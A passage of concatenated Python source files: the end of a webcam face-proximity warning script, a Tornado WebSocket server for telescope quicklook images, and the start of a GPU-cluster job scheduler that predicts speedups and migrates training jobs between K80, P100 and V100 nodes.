rectangle=(screen_width/2, screen_height/2), centered=True, font=font_30) Open = True while Open: RedScreen() for event in pygame.event.get(): if event.type == pygame.QUIT: Open = False if event.type == pygame.KEYDOWN: if event.key == pygame.K_RETURN: Open = False pygame.quit() parser = argparse.ArgumentParser(description='Code for Cascade Classifier tutorial.') parser.add_argument('--face_cascade', help='Path to face cascade.', default= cv.data.haarcascades + 'haarcascade_frontalface_default.xml') parser.add_argument('--eyes_cascade', help='Path to eyes cascade.', default= cv.data.haarcascades + 'haarcascade_eye.xml') parser.add_argument('--camera', help='Camera divide number.', type=int, default=0) args = parser.parse_args() face_cascade_name = args.face_cascade eyes_cascade_name = args.eyes_cascade face_cascade = cv.CascadeClassifier() eyes_cascade = cv.CascadeClassifier() if not face_cascade.load(cv.samples.findFile(face_cascade_name)): print('--(!)Error loading face cascade') exit(0) if not eyes_cascade.load(cv.samples.findFile(eyes_cascade_name)): print('--(!)Error loading eyes cascade') exit(0) camera_device = args.camera vs = WebcamVideoStream(src=0).start() stream = cv.VideoCapture(0, cv.CAP_DSHOW) pygame.init() screen = pygame.display.set_mode((500, 500)) clock = pygame.time.Clock() def updateGUI(): clock.tick(60) Thread(target=updateGUI, args=()).start() toggle = False timer = 0 while True: timeNow = time.time() ret, frame = stream.read() #frame = vs.read() width = detectWidth(frame) if width > 180: print(timeNow - timer) if timeNow - timer > 5: screen.fill((200,0,0)) Mbox('Your title', 'Your text', 0) warning = True else: timer = timeNow screen.fill((255, 255, 255)) warning = False pygame.display.flip() if cv.waitKey(1) & 0xFF == ord('q'): pygame.quit() break stream.release() cv.destroyAllWindows()
webserver.py
import threading import asyncio import json import base64 try: import tornado.web import tornado.websocket from tornado.log import access_log except ImportError: raise ImportError('To use SDTmonitor, you need to install tornado: \n' '\n > pip install tornado') from srttools.monitor.common import MAX_FEEDS, log def create_index_file(port, max_images=MAX_FEEDS*2): html_string = ''' <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>SRT Quicklook</title> </head> <body> <script type="text/javascript"> window.onload = function() { function init_images(n) { if(n % 2 == 0) { n++; } for(i = 0; i <= n; i++) { var div = document.getElementById("div_" + i.toString()); if(div == null) { var image = new Image(); image.id = "image_" + i.toString(); image.style.width = "100%"; image.src = "data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs%3D"; div = document.createElement("DIV"); div.setAttribute("id", "div_" + i.toString()); div.setAttribute("style", "width:50%; float:left;"); div.appendChild(image); document.body.appendChild(div); } } } function set_visibility() { var white_image = "data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs%3D"; for(i = 0; i < document.getElementsByTagName("IMG").length; i+=2) { var left = i; var right = i+1; var left_div = document.getElementById("div_" + left.toString()); var right_div = document.getElementById("div_" + right.toString()); var left_image = document.getElementById("image_" + left.toString()); var right_image = document.getElementById("image_" + right.toString()); if(left_image.src == white_image && right_image.src == white_image) { left_image.style.display = "none"; right_image.style.display = "none"; } else { left_image.style.display = "block"; right_image.style.display = "block"; } } } function connect() { var destination = document.location.href; if(destination.startsWith("file")) { destination = "localhost"; } else { destination = document.location.href.split(":")[1] } var ws = new WebSocket("ws:" + destination + ":''' + str(port) + '''/images"); ws.onopen = function() { console.log('Connected') } ws.onmessage = function(message) { var msg = JSON.parse(message.data) init_images(msg.index); var image = document.getElementById("image_" + msg.index.toString()); if(msg.image == "") { image.src = "data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs%3D"; } else { image.src = "data:image/png;base64," + msg.image; } set_visibility(); }; ws.onclose = function(e) { console.log('Socket is closed. Reconnect will be attempted in 10 seconds.'); setTimeout(function() { connect(); }, 10000); }; ws.onerror = function(err) { console.error('Socket encountered error. Closing socket'); ws.close(); }; } connect(); } </script> </body> </html>''' with open('index.html', 'w') as fobj: print(html_string, file=fobj) class WSHandler(tornado.websocket.WebSocketHandler): def initialize(self, connected_clients, images): self.connected_clients = connected_clients self.images = images def check_origin(self, origin): # This allows clients that did not send any request to the HTTPHandler previously # i.e.: a client that opens the index.html page instead of accessing it via network return True def open(self): log.info('Got connection from {}'.format(self.request.host_name)) self.connected_clients.add(self) # Send all the images to new clients keys = self.images.keys() for index in keys: self.send_image(index) def on_close(self): self.connected_clients.remove(self) log.info('Client {} disconnected'.format(self.request.host_name)) def on_message(self, message): pass def send_image(self, index): message = { 'index': index, 'image': self.images[index] } self.write_message(json.dumps(message)) class HTTPHandler(tornado.web.RequestHandler): def get(self): # Answer the HTTP request with the index.html page self.write(open('index.html', 'r').read()) class WebServer(object): def __init__(self, extension, port=8080): self.extension = extension self.port = port # Load the current images self.images = {} for index in range(MAX_FEEDS * 2): self._load_image('latest_{}.{}'.format(index, extension)) self.connected_clients = set() self.t = None self.started = False application = tornado.web.Application([ (r'/images', WSHandler, dict(connected_clients=self.connected_clients, images=self.images)), (r'/', HTTPHandler), (r'/index.html', HTTPHandler) ]) # Disable default log function, we use custom ones def log_function(_): pass application.log_request = log_function self.web_server = tornado.httpserver.HTTPServer(application) try: self.web_server.listen(self.port) except OSError: raise OSError('Port {} is already being used, choose a different one!'.format(self.port)) def start(self): self._asyncioloop = None try: asyncio.get_event_loop() except RuntimeError: self._asyncioloop = asyncio.new_event_loop() asyncio.set_event_loop(self._asyncioloop) self.ioloop = tornado.ioloop.IOLoop.current() create_index_file(self.port) self.t = threading.Thread(target=self.ioloop.start) self.t.start() self.started = True def stop(self): if self.started: self.ioloop.add_callback(self.ioloop.stop) if self._asyncioloop: self._asyncioloop.stop() if self.t: self.t.join() self.started = False def _load_image(self, image_file): index = int(image_file.split('_')[1].split('.')[0]) try: image_string = base64.b64encode(open(image_file, 'rb').read()) image_string = image_string.decode('utf-8') except IOError: image_string = '' self.images[index] = image_string return index, image_string def update(self, image_file): # Update the image in memory before sending it index, image_string = self._load_image(image_file) clients = self.connected_clients for client in clients: try: self.ioloop.add_callback(client.send_image, index) except tornado.websocket.WebSocketClosedError: try: self.connected_clients.remove() except KeyError: pass
main.py
import pdb import time import os import subprocess import re import random import json import numpy as np import glob from tensorboard.backend.event_processing.event_accumulator import EventAccumulator import socket import argparse import threading import _thread import signal from datetime import datetime import csv from sklearn import neighbors import gpu_pwr parser = argparse.ArgumentParser(description='TCP client') parser.add_argument('--tc', metavar='TESTCASE', type=str, help='select testcase') args = parser.parse_args() with open('job_queue.json', 'r') as fp: queue = json.load(fp) queue_dict = {} arrival_time = 0 for item in queue: arrival_time += np.random.poisson(30) queue_dict[item] = arrival_time queue_timer = time.time() queue_delay = {} for item in queue: queue_delay[str(item)] = 0 job_start = {} #{'49': time1, '15': time2...} JCT = {} for item in queue: JCT[str(item)] = 0 completion = {} for item in queue: completion[str(item)] = 0 overhead = {} # initialize so that every job starts with 0s overhead time for item in queue: overhead[str(item)] = 0 ovhd_start = {} # initialize this to 0 as well for item in queue: ovhd_start[str(item)] = 0 b_start = {} # initialize this to 0 as well for item in queue: b_start[str(item)] = 0 c_start = {} # initialize this to 0 as well for item in queue: c_start[str(item)] = 0 d_start = {} # initialize this to 0 as well for item in queue: d_start[str(item)] = 0 ovhd_a = {} # {1: [10, 12, ...], 2: [xx]} for item in queue: ovhd_a[str(item)] = [] ovhd_b = {} # {1: [10, 12, ...], 2: [xx]} for item in queue: ovhd_b[str(item)] = [] ovhd_c = {} # {1: [10, 12, ...], 2: [xx]} for item in queue: ovhd_c[str(item)] = [] ovhd_d = {} # {1: [10, 12, ...], 2: [xx]} for item in queue: ovhd_d[str(item)] = [] ovhd_total = {} # {1: [10, 12, ...], 2: [xx]} for item in queue: ovhd_total[str(item)] = [] k80_1st = {} for item in queue: k80_1st[str(item)] = [] p100_1st = {} for item in queue: p100_1st[str(item)] = [] v100_1st = {} for item in queue: v100_1st[str(item)] = [] num_mig = {} # initialize migration time to 0 for item in queue: num_mig[str(item)] = 0 V100_epoch_time = {} for item in queue: V100_epoch_time[str(item)] = 0 K80_epoch_time = {} for item in queue: K80_epoch_time[str(item)] = 0 P100_epoch_time = {} for item in queue: P100_epoch_time[str(item)] = 0 K80_start_time = {} for item in queue: K80_start_time[str(item)] = 0 P100_start_time = {} for item in queue: P100_start_time[str(item)] = 0 V100_start_time = {} for item in queue: V100_start_time[str(item)] = 0 promote_start_time = {} for item in queue: promote_start_time[str(item)] = 0 V100_demote_list = [] P100_demote_list = [] K80_time = {} for item in queue: K80_time[str(item)] = 0 P100_time = {} for item in queue: P100_time[str(item)] = 0 V100_time = {} for item in queue: V100_time[str(item)] = 0 gpu_usage_time = [] # don't initialize this gpu_usage = [] gpu_usage_completion = [] speedup_dict_V100 = {} for item in queue: speedup_dict_V100[str(item)] = 0 speedup_dict_P100 = {} for item in queue: speedup_dict_P100[str(item)] = 0 predict_dict_V100 = {} for item in queue: predict_dict_V100[str(item)] = 0 predict_dict_P100 = {} for item in queue: predict_dict_P100[str(item)] = 0 birthplace = {} for item in queue: birthplace[str(item)] = 'none' index = 0 all_jobs_started = False K80_cap = 16 P100_cap = 4 V100_cap = 4 K80_used = 0 P100_used = 0 V100_used = 0 K80_job = {} for i in range(K80_cap): K80_job[str(i)] = 'idle' P100_job = {} for i in range(P100_cap): P100_job[str(i)] = 'idle' V100_job = {} for i in range(V100_cap): V100_job[str(i)] = 'idle' qualified_job = [] step1_job_P100 = [] step1_job_V100 = [] step2_job = [] pc_job = [] K80_node = ['c2179', 'c2183'] P100_node = ['c2189'] V100_node = ['d1015'] host_node = 'c0172' testcase = args.tc ### also, change .h5 file folder in jobs ### INTERVAL = 30 # make decision every 30s run_log = open('run.log','w') def K80_LUT(gpu): quotient = int(gpu) // 8 remainder = int(gpu) % 8 real_node = K80_node[quotient] real_gpu = str(remainder) return real_node, real_gpu def P100_LUT(gpu): quotient = int(gpu) // 4 remainder = int(gpu) % 4 real_node = P100_node[quotient] real_gpu = str(remainder) return real_node, real_gpu def V100_LUT(gpu): quotient = int(gpu) // 4 remainder = int(gpu) % 4 real_node = V100_node[quotient] real_gpu = str(remainder) return real_node, real_gpu ######################### do a regression fit ######################## with open('v100_meas_data/x1_data.json') as f: x1_v100 = json.load(f) with open('v100_meas_data/x2_data.json') as f: x2_v100 = json.load(f) with open('v100_meas_data/x3_data.json') as f: x3_v100 = json.load(f) x1_norm = [(i - min(x1_v100)) / (max(x1_v100) - min(x1_v100)) for i in x1_v100] x2_norm = [(i - min(x2_v100)) / (max(x2_v100) - min(x2_v100)) for i in x2_v100] x3_norm = [(i - min(x3_v100)) / (max(x3_v100) - min(x3_v100)) for i in x3_v100] # create training data x_train = [] for i in range(len(x1_norm)): x_train.append([x1_norm[i], x2_norm[i], x3_norm[i]]) with open('v100_meas_data/y_data_KV.json') as f: y_train_KV = json.load(f) model_V100_KV = neighbors.KNeighborsRegressor(n_neighbors = 3, weights='distance') model_V100_KV.fit(x_train, y_train_KV) with open('v100_meas_data/y_data_KP.json') as f: y_train_KP = json.load(f) model_V100_KP = neighbors.KNeighborsRegressor(n_neighbors = 3, weights='distance') model_V100_KP.fit(x_train, y_train_KP) with open('p100_meas_data/x1_data.json') as f: x1_p100 = json.load(f) with open('p100_meas_data/x2_data.json') as f: x2_p100 = json.load(f) with open('p100_meas_data/x3_data.json') as f: x3_p100 = json.load(f) x1_norm = [(i - min(x1_p100)) / (max(x1_p100) - min(x1_p100)) for i in x1_p100] x2_norm = [(i - min(x2_p100)) / (max(x2_p100) - min(x2_p100)) for i in x2_p100] x3_norm = [(i - min(x3_p100)) / (max(x3_p100) - min(x3_p100)) for i in x3_p100] # create training p100 x_train = [] for i in range(len(x1_norm)): x_train.append([x1_norm[i], x2_norm[i], x3_norm[i]]) with open('p100_meas_data/y_data_KP.json') as f: y_train_KP = json.load(f) model_P100_KP = neighbors.KNeighborsRegressor(n_neighbors = 3, weights='distance') model_P100_KP.fit(x_train, y_train_KP) with open('p100_meas_data/y_data_KV.json') as f: y_train_KV = json.load(f) model_P100_KV = neighbors.KNeighborsRegressor(n_neighbors = 3, weights='distance') model_P100_KV.fit(x_train, y_train_KV) #################################################################### def send_signal(node, cmd): # Create a TCP/IP socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) port = 10000 # Connect the socket to the port where the server is listening server_address = (node, int(port)) print('connecting to {} port {}'.format(*server_address), file=run_log, flush=True) sock.connect(server_address) try: # Send data message = cmd.encode('utf-8') #b'save 35' #b'start 35 gpu 6'#b'save 35' print('sending {!r}'.format(message), file=run_log, flush=True) sock.sendall(message) while True: data = sock.recv(32) if 'success' in data.decode('utf-8'): # print('received {!r}'.format(data)) break else: print('waiting for success signal', file=run_log, flush=True) time.sleep(1) finally: #print('closing socket') sock.close() def max_speedup_promotion_P2V(V100_free, promote_list): num_promote = len(promote_list) global speedup_dict_V100 # selectively promote among active V100 jobs and promote list jobs V100_pool = promote_list if num_promote <= V100_free: # promote all jobs as well return promote_list[:], [] else: # promote the top 4 jobs pool_dict = {} V100_avail = V100_free for job in V100_pool: if job in speedup_dict_V100: pool_dict[job] = speedup_dict_V100[job] sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=True)[:V100_avail] promotion_list = list(set(promote_list).intersection(sorted_pool)) demotion_list = [] return promotion_list, demotion_list def max_speedup_promotion_V100(V100_free, promote_list, demote_list): num_promote = len(promote_list) global speedup_dict_V100 # selectively promote among active V100 jobs and promote list jobs V100_pool = list(set(demote_list).union(promote_list)) if num_promote <= V100_free: # promote all jobs as well return promote_list[:], [] else: # promote the top 4 jobs pool_dict = {} V100_avail = V100_free + len(demote_list) for job in V100_pool: if job in speedup_dict_V100: pool_dict[job] = speedup_dict_V100[job] sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=True)[:V100_avail] promotion_list = list(set(promote_list).intersection(sorted_pool)) demotion_list = list(set(demote_list).difference(sorted_pool)) if 'idle' in demotion_list: demotion_list.remove('idle') # this includes force demotion # lazy migration, for every V100 job from high speeup to low speedup and not in sorted_pool, compare it with # K80 jobs in sorted_pool, from low speedup to high speedup. If difference within 0.2, replace the K80 job # in sorted pool for job_demote in sorted(pool_dict, key=pool_dict.get, reverse=True): if job_demote in demotion_list: for job_promote in sorted(pool_dict, key=pool_dict.get, reverse=False): if job_promote in promotion_list: if speedup_dict_V100[job_promote] - speedup_dict_V100[job_demote] < 0.3: demotion_list.remove(job_demote) promotion_list.remove(job_promote) break return promotion_list, demotion_list def max_speedup_promotion_P100(P100_free, promote_list, demote_list): num_promote = len(promote_list) global speedup_dict_P100 # selectively promote among active P100 jobs and promote list jobs P100_pool = list(set(demote_list).union(promote_list)) if num_promote <= P100_free: # promote all jobs as well return promote_list[:], [] else: # promote the top 4 jobs pool_dict = {} P100_avail = P100_free + len(demote_list) for job in P100_pool: if job in speedup_dict_P100: pool_dict[job] = speedup_dict_P100[job] sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=True)[:P100_avail] promotion_list = list(set(promote_list).intersection(sorted_pool)) demotion_list = list(set(demote_list).difference(sorted_pool)) if 'idle' in demotion_list: demotion_list.remove('idle') # this includes force demotion # lazy migration, for every P100 job from high speeup to low speedup and not in sorted_pool, compare it with # K80 jobs in sorted_pool, from low speedup to high speedup. If difference within 0.2, replace the K80 job # in sorted pool for job_demote in sorted(pool_dict, key=pool_dict.get, reverse=True): if job_demote in demotion_list: for job_promote in sorted(pool_dict, key=pool_dict.get, reverse=False): if job_promote in promotion_list: if speedup_dict_P100[job_promote] - speedup_dict_P100[job_demote] < 0.3: demotion_list.remove(job_demote) promotion_list.remove(job_promote) break return promotion_list, demotion_list def min_speedup_demotion_V100(promote_list, demote_list): global speedup_dict_V100 K80_pool = list(set(promote_list).union(demote_list)) pool_dict = {} for job in K80_pool: if job in speedup_dict_V100: pool_dict[job] = speedup_dict_V100[job] sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=False)[:len(promote_list)] # least speedup jobs demotion_list = list(set(demote_list).intersection(sorted_pool)) promotion_list = list(set(promote_list).difference(sorted_pool)) # lazy migration, for every V100 job from high speeup to low speedup and not in sorted_pool, compare it with # K80 jobs in sorted_pool, from low speedup to high speedup. If difference within 0.2, replace the K80 job # in sorted pool for job_demote in sorted(pool_dict, key=pool_dict.get, reverse=True): if job_demote in demotion_list: for job_promote in sorted(pool_dict, key=pool_dict.get, reverse=False): if job_promote in promotion_list: if speedup_dict_V100[job_promote] - speedup_dict_V100[job_demote] < 0.15: demotion_list.remove(job_demote) promotion_list.remove(job_promote) break return promotion_list, demotion_list def min_speedup_demotion_P100(promote_list, demote_list): # in this case available jobs have all demoted to idle K80s global speedup_dict_P100 K80_pool = list(set(promote_list).union(demote_list)) pool_dict = {} for job in K80_pool: if job in speedup_dict_P100: pool_dict[job] = speedup_dict_P100[job] sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=False)[:len(promote_list)] # least speedup jobs demotion_list = list(set(demote_list).intersection(sorted_pool)) promotion_list = list(set(promote_list).difference(sorted_pool)) # lazy migration, for every V100 job from high speeup to low speedup and not in sorted_pool, compare it with # P100 jobs in sorted_pool, from low speedup to high speedup. If difference within 0.2, replace the P100 job # in sorted pool for job_demote in sorted(pool_dict, key=pool_dict.get, reverse=True): if job_demote in demotion_list: for job_promote in sorted(pool_dict, key=pool_dict.get, reverse=False): if job_promote in promotion_list: if speedup_dict_P100[job_promote] - speedup_dict_P100[job_demote] < 0.15: # use 0.1 for P100 pairs demotion_list.remove(job_demote) promotion_list.remove(job_promote) break return promotion_list, demotion_list def min_speedup_demotion_free(K80_free, P100_demote_list, V100_demote_list, have_to_demote): global speedup_dict_P100, speedup_dict_V100 if have_to_demote >= K80_free: if len(P100_demote_list) + len(V100_demote_list) <= K80_free: return P100_demote_list[:], V100_demote_list[:] # returns P100 demoted, V100 demoted else: K80_pool = list(set(P100_demote_list).union(V100_demote_list)) pool_dict = {} for job in K80_pool: if job in P100_demote_list: pool_dict[job] = speedup_dict_P100[job] elif job in V100_demote_list: pool_dict[job] = speedup_dict_V100[job] sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=False)[:K80_free] # least speedup jobs P100_demotion = list(set(P100_demote_list).intersection(sorted_pool)) V100_demotion = list(set(V100_demote_list).intersection(sorted_pool)) return P100_demotion, V100_demotion else: if len(P100_demote_list) + len(V100_demote_list) <= have_to_demote: return P100_demote_list[:], V100_demote_list[:] # returns P100 demoted, V100 demoted else: K80_pool = list(set(P100_demote_list).union(V100_demote_list)) pool_dict = {} for job in K80_pool: if job in P100_demote_list: pool_dict[job] = speedup_dict_P100[job] elif job in V100_demote_list: pool_dict[job] = speedup_dict_V100[job] sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=False)[:have_to_demote] # least speedup jobs P100_demotion = list(set(P100_demote_list).intersection(sorted_pool)) V100_demotion = list(set(V100_demote_list).intersection(sorted_pool)) return P100_demotion, V100_demotion def save_job(node, job): # save_job('c2176', '50') # first wait for the job to be qualified for checkpointing while True: # wait for ckpt_qual to be available global ckpt_qual_dict if ckpt_qual_dict['job'+job] == 1: ckpt_qual_dict['job'+job] = 0 break time.sleep(5) global pid_dict pid = pid_dict['job'+job] send_signal(node, 'save ' + job + ' pid ' + pid) # 'save 50 pid 10000' global ovhd_start ovhd_start[job] = time.time() time.sleep(3) # in case epoch_waste is communicate too frequently def kill_job(node, job): # kill_job('c2176', '50') send_signal(node, 'kill ' + job) # resume job def resume_job(node, gpu, job): # resume_job('c2176', '3', '50') cmd = 'resume ' + job + ' gpu ' + gpu send_signal(node, cmd) # start job def start_job(node, gpu, job): cmd = 'start ' + job + ' gpu ' + gpu send_signal(node, cmd) # function that checks the tensorboard log of currently running jobs and logs jobs that have finished the first epoch # in a global list. Once it's done, it will be in a queue to be promoted to V100 for 3 more epochs. def check_step1_complete_V100(job_list): log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/' global step1_job_V100 global V100_epoch_time for job in job_list: if job not in step1_job_V100 and job != 'idle': log_dir = log_path + 'job' + job + '/*' dirs = glob.glob(log_dir) dirs.sort() tc = '' for item in dirs: item_node = item.split('/')[-1].split('.')[-1] if item_node in V100_node: tc = item if tc != '': iterator = EventAccumulator(tc).Reload() tag = 'loss' try: if len(iterator.Scalars(tag)) > 2: # this way we can collect one epoch time wall_time = [t.wall_time for t in iterator.Scalars(tag)] V100_epoch_time[job] = wall_time[1] - wall_time[0] step1_job_V100.append(job) print('job' + job + ' has reached step1 complete on V100', file=run_log, flush=True) except Exception: pass def check_step1_complete_P100(job_list): log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/' global step1_job_P100 global P100_epoch_time for job in job_list: if job not in step1_job_P100 and job != 'idle': log_dir = log_path + 'job' + job + '/*' dirs = glob.glob(log_dir) dirs.sort() tc = '' for item in dirs: item_node = item.split('/')[-1].split('.')[-1] if item_node in P100_node: tc = item if tc != '': iterator = EventAccumulator(tc).Reload() tag = 'loss' try: if len(iterator.Scalars(tag)) > 2: # this way we can collect one epoch time wall_time = [t.wall_time for t in iterator.Scalars(tag)] P100_epoch_time[job] = wall_time[1] - wall_time[0] step1_job_P100.append(job) print('job' + job + ' has reached step1 complete on P100', file=run_log, flush=True) except Exception: pass def check_step2_complete(job_list): log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/' global step1_job_P100, step1_job_V100 global step2_job global K80_epoch_time step1_job = list(set(step1_job_P100).union(step1_job_V100)) for job in job_list: if job in step1_job and job not in step2_job and job != 'idle': log_dir = log_path + 'job' + job + '/*' dirs = glob.glob(log_dir) dirs.sort() tc = '' for item in dirs: item_node = item.split('/')[-1].split('.')[-1] if item_node in K80_node: tc = item if tc != '': iterator = EventAccumulator(tc).Reload() tag = 'loss' try: if len(iterator.Scalars(tag)) > 2: # this way we can collect one epoch time wall_time = [t.wall_time for t in iterator.Scalars(tag)] K80_epoch_time[job] = wall_time[1] - wall_time[0] step2_job.append(job) print('job' + job + ' has reached step2 complete on K80', file=run_log, flush=True) except Exception: pass # measure job def measure_job(node, gpu, job): cmd = 'measure ' + job + ' gpu ' + gpu send_signal(node, cmd) ############### first clear finish status of all jobs #################### pid_dict = {} for i in range(len(queue)): job_name = 'job' + str(i + 1) pid_dict[job_name] = 0 checkpoint_dict = {} for i in range(len(queue)): job_name = 'job' + str(i + 1) checkpoint_dict[job_name] = 0 ckpt_qual_dict = {} for i in range(len(queue)): job_name = 'job' + str(i + 1) ckpt_qual_dict[job_name] = 0 finish_dict = {} for i in range(len(queue)): job_name = 'job' + str(i + 1) finish_dict[job_name] = 0 epoch_waste_dict = {} for i in range(len(queue)): job_name = 'job' + str(i + 1) epoch_waste_dict[job_name] = 0 #################### background thread running TCP socket ######################## def thread_function(): # here listen on the socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_address = (host_node, 10002) print('starting up on {} port {}'.format(*server_address), file=run_log, flush=True) sock.bind(server_address) sock.listen(5) while True: # Wait for a connection connection, client_address = sock.accept() try: while True: data = connection.recv(32) if data: data_str = data.decode('utf-8') global K80_start_time, P100_start_time, V100_start_time, promote_start_time global K80_job, P100_job, V100_job global K80_time, P100_time, V100_time global ovhd_a, ovhd_b, ovhd_c, ovhd_d, k80_1st, p100_1st, v100_1st, ovhd_start, overhead, ovhd_total global b_start, c_start, d_start, completion if 'ckpt_qual' in data_str: global ckpt_qual_dict job_name = data_str.split(' ')[0] ckpt_qual_dict[job_name] = 1 elif 'finish' in data_str: global finish_dict job_name = data_str.split(' ')[0] job = job_name.replace('job','') finish_dict[job_name] = 1 JCT[job] = int(time.time() - job_start[job]) if job in list(K80_job.values()): K80_time[job] += int(time.time() - K80_start_time[job]) elif job in list(P100_job.values()): P100_time[job] += int(time.time() - P100_start_time[job]) elif job in list(V100_job.values()): V100_time[job] += int(time.time() - V100_start_time[job]) elif 'pid' in data_str: global pid_dict job_name = data_str.split(' ')[0] pid = data_str.split(' ')[2] pid_dict[job_name] = pid elif 'checkpoint' in data_str: # can only be received after save signal is sent global checkpoint_dict job_name = data_str.split(' ')[0] job = job_name.replace('job','') checkpoint_dict[job_name] = 1 ovhd_a[job].append(int(time.time() - ovhd_start[job])) b_start[job] = time.time() elif 'waste' in data_str: global epoch_waste_dict job_name = data_str.split(' ')[0] epoch_waste_time = data_str.split(' ')[2] epoch_waste_dict[job_name] += int(epoch_waste_time) elif 'b_end' in data_str: job_name = data_str.split(' ')[0] job = job_name.replace('job','') ovhd_b[job].append(int(time.time() - b_start[job])) c_start[job] = time.time() elif 'c_end' in data_str: job_name = data_str.split(' ')[0] job = job_name.replace('job','') ovhd_c[job].append(int(time.time() - c_start[job])) d_start[job] = time.time() elif 'd_end' in data_str: job_name = data_str.split(' ')[0] job = job_name.replace('job','') ovhd_d[job].append(int(time.time() - d_start[job])) ovhd_total[job].append(int(time.time() - ovhd_start[job])) if ovhd_start[job] != 0: overhead[job] += int(time.time() - ovhd_start[job]) ovhd_start[job] = 0 if job in list(K80_job.values()): K80_start_time[job] = time.time() elif job in list(P100_job.values()): P100_start_time[job] = time.time() elif job in list(V100_job.values()): V100_start_time[job] = time.time() promote_start_time[job] = time.time() elif '1st_epoch' in data_str: # 'job50 1st_epoch 35' job_name = data_str.split(' ')[0] job = job_name.replace('job','') epoch_time = int(data_str.split(' ')[2]) if job in list(K80_job.values()): k80_1st[job].append(epoch_time) elif job in list(P100_job.values()): p100_1st[job].append(epoch_time) elif job in list(V100_job.values()): v100_1st[job].append(epoch_time) elif 'completion' in data_str: # 'job50 completion 0.33' job_name = data_str.split(' ')[0] job = job_name.replace('job','') completion_portion = float(data_str.split(' ')[2]) completion[job] = completion_portion #if 'ckpt_qual' in data_str or 'finish' in data_str or 'checkpoint' in data_str: # print('received ' + data_str) connection.sendall(b'success') #time.sleep(5) else: break finally: connection.close() x = threading.Thread(target=thread_function, daemon=True) x.start() ############################################################################### ###################################################################### while True: # termination condition: # all the jobs have finished ################### check for finished jobs on K80 and V100 ############################## for gpu, job in K80_job.items(): if job != 'idle': if finish_dict['job'+job] == 1: K80_used -= 1 K80_job[gpu] = 'idle' print('K80 finished job: ' + job, file=run_log, flush=True) for gpu, job in P100_job.items(): if job != 'idle': if finish_dict['job'+job] == 1: P100_used -= 1 P100_job[gpu] = 'idle' print('P100 finished job: ' + job, file=run_log, flush=True) if job in P100_demote_list: P100_demote_list.remove(job) for gpu, job in V100_job.items(): if job != 'idle': if finish_dict['job'+job] == 1: V100_used -= 1 V100_job[gpu] = 'idle' print('V100 finished job: ' + job, file=run_log, flush=True) if job in V100_demote_list: V100_demote_list.remove(job) ################ check step1 finished job of K80 jobs and step 2 of V100 ################# check_step1_complete_V100(list(V100_job.values())) # make predictions for jobs finished step1 on V100, only once for each job's lifetime for gpu, job in V100_job.items(): if job not in qualified_job and job != 'idle': if job in step1_job_V100: real_node, real_gpu = V100_LUT(gpu) kill_job(real_node, job) qualified_job.append(job) print('job' + job + ' has been qualified for demotion', file=run_log, flush=True) time.sleep(3) # wait for run.sh to finish x1, x3 = gpu_pwr.process_csv('job'+job, testcase) x2 = 3600 / V100_epoch_time[job] # preprocess the data x1 = (x1 - min(x1_v100)) / (max(x1_v100) - min(x1_v100)) x2 = (x2 - min(x2_v100)) / (max(x2_v100) - min(x2_v100)) x3 = (x3 - min(x3_v100)) / (max(x3_v100) - min(x3_v100)) speedup_pred_KV = model_V100_KV.predict(np.array([x1, x2, x3]).reshape((1,-1)))[0] / 100 speedup_dict_V100[job] = speedup_pred_KV predict_dict_V100[job] = speedup_pred_KV speedup_pred_KP = model_V100_KP.predict(np.array([x1, x2, x3]).reshape((1,-1)))[0] / 100 speedup_dict_P100[job] = speedup_pred_KP predict_dict_P100[job] = speedup_pred_KP check_step1_complete_P100(list(P100_job.values())) # make predictions for jobs finished step1 on P100, only once for each job's lifetime for gpu, job in P100_job.items(): if job not in qualified_job and job != 'idle': if job in step1_job_P100: real_node, real_gpu = P100_LUT(gpu) kill_job(real_node, job) qualified_job.append(job) print('job' + job + ' has been qualified for demotion', file=run_log, flush=True) time.sleep(3) # wait for run.sh to finish x1, x3 = gpu_pwr.process_csv('job'+job, testcase) x2 = 3600 / P100_epoch_time[job] # preprocess the data x1 = (x1 - min(x1_p100)) / (max(x1_p100) - min(x1_p100)) x2 = (x2 - min(x2_p100)) / (max(x2_p100) - min(x2_p100)) x3 = (x3 - min(x3_p100)) / (max(x3_p100) - min(x3_p100)) speedup_pred_KP = model_P100_KP.predict(np.array([x1, x2, x3]).reshape((1,-1)))[0] / 100 speedup_dict_P100[job] = speedup_pred_KP predict_dict_P100[job] = speedup_pred_KP speedup_pred_KV = model_P100_KV.predict(np.array([x1, x2, x3]).reshape((1,-1)))[0] / 100 speedup_dict_V100[job] = speedup_pred_KV predict_dict_V100[job] = speedup_pred_KV check_step2_complete(list(K80_job.values())) # correct speedup predictions for job in speedup_dict_V100: if speedup_dict_V100[job] != 0 and speedup_dict_V100[job] == predict_dict_P100[job]: if K80_epoch_time[job] != 0 and V100_epoch_time[job] != 0: speedup_dict_V100[job] = (K80_epoch_time[job] - V100_epoch_time[job]) / K80_epoch_time[job] for job in speedup_dict_P100: if speedup_dict_P100[job] != 0 and speedup_dict_P100[job] == predict_dict_P100[job]: if K80_epoch_time[job] != 0 and P100_epoch_time[job] != 0: speedup_dict_P100[job] = (K80_epoch_time[job] - P100_epoch_time[job]) / K80_epoch_time[job] ############### record number of newly arrived jobs ################ new_arrival = 0 index_cpy = index while True: time_passed = int(time.time() - queue_timer) if index_cpy >= len(queue): break elif time_passed >= queue_dict[queue[index_cpy]]: new_arrival += 1 index_cpy += 1 elif time_passed < queue_dict[queue[index_cpy]]: break ################ make promotion decisions ######################## V100_free = V100_cap - V100_used P100_free = P100_cap - P100_used K80_free = K80_cap - K80_used if new_arrival == 0: # this returns available jobs for promotion. Has to be qualified, and 